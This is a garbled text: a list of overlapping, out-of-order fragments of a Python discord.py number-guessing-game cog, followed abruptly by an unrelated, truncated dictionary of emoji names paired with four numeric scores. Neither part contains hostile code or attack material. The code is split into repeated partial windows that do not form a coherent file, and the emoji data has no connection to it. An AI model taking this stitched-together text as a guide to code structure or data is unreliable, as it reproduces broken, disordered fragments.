[ "with nothing at stake.\"): def __init__(self, bot): self.bot = bot async def tick(self,", "async def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct = num", "@commands.command( name='free_guess_now', help='Guess a random number from 1-9', ) async def free_guess_now(self, ctx,", "ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9', )", "class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"): def __init__(self, bot):", "if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now',", "help='Guess a random number between 1-99 or a provided range.' ) async def", "a random number from 1-9', ) async def free_guess_now(self, ctx, num: int): answer", "import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game", "1-9', ) async def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct", "try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from", ") async def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await", "GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"): def __init__(self, bot): self.bot", "except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The answer is {answer}')", "except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9', ) async", "f'Incorrect. 
The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between", "random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await", "return await ctx.reply(f'Sorry, you took too long. The answer is {answer}') correct =", "import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at", "else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number", "ctx.reply(f'Sorry, you took too long. The answer is {answer}') correct = int(guess.content) ==", "import discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free", "typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def", "random import asyncio from discord.ext import commands import discord import typing from base", "ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit()", "The answer is {answer}') correct = int(guess.content) == answer await self.tick(ctx, correct) await", "9) correct = num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' 
if correct", "between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start,", "and m.content.isdigit() answer = random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0)", "correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try:", "= '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji)", "= num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect.", "ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) def setup(bot): bot.add_cog(GuessingGame(bot))", "= 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m):", "await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and", "MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number", "between 1-99 or a provided range.' ) async def free_guess(self, ctx, start: typing.Optional[int]", "random.randint(1, 9) correct = num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if", "correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess", "== ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess = await self.bot.wait_for('message',", "or a provided range.' 
) async def free_guess(self, ctx, start: typing.Optional[int] = 1,", "= bot async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}'", "import commands import discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class", "m.content.isdigit() answer = random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except", "= random.randint(1, 9) correct = num == answer await self.tick(ctx, correct) await ctx.reply('Correct!'", "range.' ) async def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99):", "int): answer = random.randint(1, 9) correct = num == answer await self.tick(ctx, correct)", "mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99 or a provided range.'", "correct = num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else", "number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer =", "self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The", "too long. The answer is {answer}') correct = int(guess.content) == answer await self.tick(ctx,", "correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) def", "took too long. The answer is {answer}') correct = int(guess.content) == answer await", "name='free_guess', help='Guess a random number between 1-99 or a provided range.' 
) async", "answer = random.randint(1, 9) correct = num == answer await self.tick(ctx, correct) await", "typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game --", "name=\"Free guessing game -- with nothing at stake.\"): def __init__(self, bot): self.bot =", "await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long.", "bot): self.bot = bot async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY", "ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct,", "check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The answer", "free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number", "long. The answer is {answer}') correct = int(guess.content) == answer await self.tick(ctx, correct)", "__init__(self, bot): self.bot = bot async def tick(self, ctx, correct): emoji = '\\N{WHITE", "number between 1-99 or a provided range.' ) async def free_guess(self, ctx, start:", "timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The answer is", "-- with nothing at stake.\"): def __init__(self, bot): self.bot = bot async def", "a random number between 1-99 or a provided range.' ) async def free_guess(self,", "number from 1-9', ) async def free_guess_now(self, ctx, num: int): answer = random.randint(1,", "base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing", "self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. 
The answer is {answer}', mention_author=True)", "answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99 or", "{answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99 or a provided", "= random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return", "answer = random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError:", "{answer}') correct = int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct", "asyncio from discord.ext import commands import discord import typing from base import BaseCog", "from discord.ext import commands import discord import typing from base import BaseCog #", "tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS", "HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException:", "nothing at stake.\"): def __init__(self, bot): self.bot = bot async def tick(self, ctx,", "async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct", "pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9', ) async def free_guess_now(self,", ") async def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct =", "if correct else f'Incorrect. 
The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a", "end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry,", "BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"):", "try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you", "provided range.' ) async def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]=", "The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99", "is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess", "def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a", "is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99 or a", "answer is {answer}') correct = int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!'", "a provided range.' 
) async def free_guess(self, ctx, start: typing.Optional[int] = 1, end:", "https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"): def __init__(self,", "from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with", "async def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess", "'\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random", "= await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too", "emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await", "MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command(", "game -- with nothing at stake.\"): def __init__(self, bot): self.bot = bot async", "ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}'", "commands import discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog,", "answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. 
The answer is", "self.bot = bot async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK", "m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess = await", "help='Guess a random number from 1-9', ) async def free_guess_now(self, ctx, num: int):", "def __init__(self, bot): self.bot = bot async def tick(self, ctx, correct): emoji =", "stake.\"): def __init__(self, bot): self.bot = bot async def tick(self, ctx, correct): emoji", "from 1-9', ) async def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9)", "guessing game -- with nothing at stake.\"): def __init__(self, bot): self.bot = bot", "def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct = num ==", "end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author", "random number from 1-9', ) async def free_guess_now(self, ctx, num: int): answer =", "= int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect.", "await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}',", "1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return", "is {answer}') correct = int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if", "correct = int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' 
if correct else", "free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct = num == answer", "await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9',", "num: int): answer = random.randint(1, 9) correct = num == answer await self.tick(ctx,", "ctx, num: int): answer = random.randint(1, 9) correct = num == answer await", "a number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer", "correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command(", "import random import asyncio from discord.ext import commands import discord import typing from", "def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try:", "== answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer", "ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between", "typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author ==", "CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass", "@commands.command( name='free_guess', help='Guess a random number between 1-99 or a provided range.' )", "await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) def setup(bot):", "else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a", "correct else f'Incorrect. 
The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random", "import asyncio from discord.ext import commands import discord import typing from base import", "name='free_guess_now', help='Guess a random number from 1-9', ) async def free_guess_now(self, ctx, num:", "await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command( name='free_guess',", "int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The", "num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The", "discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9', ) async def", "guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took", "start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}')", "bot async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if", "# https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"): def", "at stake.\"): def __init__(self, bot): self.bot = bot async def tick(self, ctx, correct):", "asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The answer is {answer}') correct", "def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else", "random number between 1-99 or a provided range.' 
) async def free_guess(self, ctx,", "99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author", "discord.ext import commands import discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py", "1-99 or a provided range.' ) async def free_guess(self, ctx, start: typing.Optional[int] =", "await ctx.reply(f'Sorry, you took too long. The answer is {answer}') correct = int(guess.content)", "discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing", "you took too long. The answer is {answer}') correct = int(guess.content) == answer", "{start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end)", "return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess =", "ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess", "'\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except" ]
[ "import os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc')", "from __future__ import division from __future__ import print_function import unittest from trollius import", "= socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as", "os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno,", "from __future__ import print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def", "division from __future__ import print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase):", "-*- coding: utf-8 -*- \"\"\" Tests for py33_exceptions. \"\"\" from __future__ import absolute_import", "# -*- coding: utf-8 -*- \"\"\" Tests for py33_exceptions. \"\"\" from __future__ import", "py33_exceptions. \"\"\" from __future__ import absolute_import from __future__ import division from __future__ import", "__future__ import print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self):", "for py33_exceptions. 
\"\"\" from __future__ import absolute_import from __future__ import division from __future__", "s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if __name__", "__future__ import absolute_import from __future__ import division from __future__ import print_function import unittest", "s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError)", "import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import", "errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if __name__ == '__main__':", "# https://github.com/jamadden/trollius/issues/17 import socket import os import errno s = socket.socket() os.close(s.fileno()) with", "unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket", "from __future__ import absolute_import from __future__ import division from __future__ import print_function import", "__future__ import division from __future__ import print_function import unittest from trollius import py33_exceptions", "import print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): #", "import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF)", "with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, 
errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc')", "self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if __name__ ==", "import division from __future__ import print_function import unittest from trollius import py33_exceptions class", "self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno,", "with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if __name__ == '__main__': unittest.main()", "absolute_import from __future__ import division from __future__ import print_function import unittest from trollius", "TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno s =", "py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno", "coding: utf-8 -*- \"\"\" Tests for py33_exceptions. 
\"\"\" from __future__ import absolute_import from", "\"\"\" from __future__ import absolute_import from __future__ import division from __future__ import print_function", "socket import os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc:", "errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with", "from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import", "os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send,", "as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF)", "import absolute_import from __future__ import division from __future__ import print_function import unittest from", "utf-8 -*- \"\"\" Tests for py33_exceptions. \"\"\" from __future__ import absolute_import from __future__", "trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os", "socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc:", "-*- \"\"\" Tests for py33_exceptions. 
\"\"\" from __future__ import absolute_import from __future__ import", "class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno s", "test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno s = socket.socket() os.close(s.fileno())", "import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import", "import socket import os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as", "print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17", "https://github.com/jamadden/trollius/issues/17 import socket import os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error)", "exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if", "def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno s = socket.socket()", "\"\"\" Tests for py33_exceptions. \"\"\" from __future__ import absolute_import from __future__ import division", "Tests for py33_exceptions. \"\"\" from __future__ import absolute_import from __future__ import division from" ]
[ "0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138,", "0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126,", "[0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195,", "0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\":", "0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172],", "\":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177,", "0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001,", "0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\":", "0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\":", "\":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207,", "0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151],", "\":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243,", 
"0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191],", "0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121],", "[0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442,", "0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\":", "0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\":", "0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\":", "0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\":", "0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\":", "0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\":", "0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304],", "[0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215,", "0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\":", "[0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], 
\":antenna_bars:\": [0.16399999999999998, 0.122, 0.151,", "0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134,", "[0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25,", "0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\":", "0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\":", "\":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175,", "0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16],", "0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\":", "0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\":", "0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316],", "0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259,", "0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307,", "0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 
